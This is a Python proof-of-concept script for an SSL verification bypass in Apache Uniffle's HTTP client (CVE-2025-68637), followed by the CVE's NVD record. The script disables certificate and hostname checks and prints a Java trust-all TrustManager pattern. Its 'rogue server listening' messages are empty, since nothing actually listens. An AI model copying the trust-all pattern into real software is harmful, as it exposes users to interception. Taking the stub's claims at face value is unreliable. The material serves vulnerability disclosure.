CVE-2025-68637

# CVE-2025-68637 PoC - MITM Attack on Uniffle HTTP Client # This PoC demonstrates the SSL verification bypass vulnerability import ssl import http.server import socketserver import threading # Create an insecure SSL context that doesn't verify certificates insecure_context = ssl.create_default_context() insecure_context.check_hostname = False insecure_context.verify_mode = ssl.CERT_NONE # Simulate Uniffle client connecting with disabled SSL verification def exploit_mitm(): """ Attacker performs MITM attack by: 1. Setting up a rogue server with self-signed certificate 2. Intercepting traffic between Uniffle client and Coordinator 3. Capturing/modifying REST API requests and responses """ # Malicious server configuration malicious_server_config = { 'host': '0.0.0.0', 'port': 19999, 'certfile': '/path/to/self-signed-cert.pem', 'keyfile': '/path/to/private-key.pem' } print('[+] MITM Attack Setup Complete') print('[+] Rogue server listening on port 19999') print('[+] Waiting for Uniffle client connections...') return malicious_server_config def demonstrate_vulnerable_code(): """ Vulnerable Uniffle client code pattern: """ vulnerable_code = ''' // Vulnerable configuration in Uniffle HTTP client SSLContext sslContext = SSLContext.getInstance("TLS"); sslContext.init(null, new TrustManager[]{new TrustAllManager()}, null); // Hostname verification disabled HostnameVerifier allHostsValid = (hostname, session) -> true; HttpsURLConnection.setDefaultHostnameVerifier(allHostsValid); ''' print(vulnerable_code) if __name__ == '__main__': exploit_mitm() demonstrate_vulnerable_code()

{"cve": {"id": "CVE-2025-68637", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:17:05.860", "lastModified": "2026-01-16T14:34:16.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Uniffle HTTP client is configured to trust all SSL certificates and\n\ndisables hostname verification by default. This insecure configuration\nexposes all REST API communication between the Uniffle CLI/client and the\nUniffle Coordinator service to potential Man-in-the-Middle (MITM) attacks.\n\n\nThis issue affects all versions from before 0.10.0.\n\nUsers are recommended to upgrade to version 0.10.0, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-297"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:uniffle:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.10.0", "matchCriteriaId": "67EB1D78-AD8A-4795-95D5-ED54F7B0514C"}]}]}], "references": [{"url": "https://lists.apache.org/thread/trvdd11hmpbjno3t8rc9okr4t036ox2v", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory", "Issue Tracking"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/27/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}